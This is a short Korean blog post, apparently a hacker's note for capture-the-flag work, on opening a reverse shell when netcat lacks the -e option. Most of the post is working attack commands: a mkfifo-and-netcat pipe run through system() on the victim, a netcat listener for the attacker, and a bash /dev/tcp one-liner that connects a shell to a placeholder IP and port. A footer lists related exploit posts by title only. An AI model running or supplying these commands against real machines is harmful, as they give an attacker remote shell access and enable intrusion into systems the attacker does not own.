몇몇 라이트업들을 보니 "nc -e /bin/sh IP PORT" 등으로 리버스텔넷을 하는 경우가 있다.
근데, 난 안됀다... e옵션이 없다.
그래서 찾아본 다른 방법
victim
system("mkfifo /tmp/tunz; nc IP PORT 0< /tmp/tunz | /bin/sh 1> /tmp/tunz")
attacker
$ nc -l -p PORT -vvv
(단, 접속후 큐파일, /tmp/tunz은 꼭 지우도록 한다.)
추가)
/bin/bash -i >& /dev/tcp/IP/PORT 0>&1
/dev/tcp 가 있으면 그냥, 저기에 IP,PORT만 써넣으면 됌
'Computer Security > System' 카테고리의 다른 글
CVE-2013-2094 리눅스 로컬권한상승 취약점 (7) | 2013.08.06 |
---|---|
Race Condition one-shot exploit (1) | 2013.08.02 |
Hindering ROP Using In-Place Code Randomization (2) | 2013.06.26 |
libc 주소 randomization 해제 트릭 (1) | 2013.05.29 |
리버스쉘과 바인드쉘이 안될때 대처법 (dup2+/bin/sh) (0) | 2013.04.22 |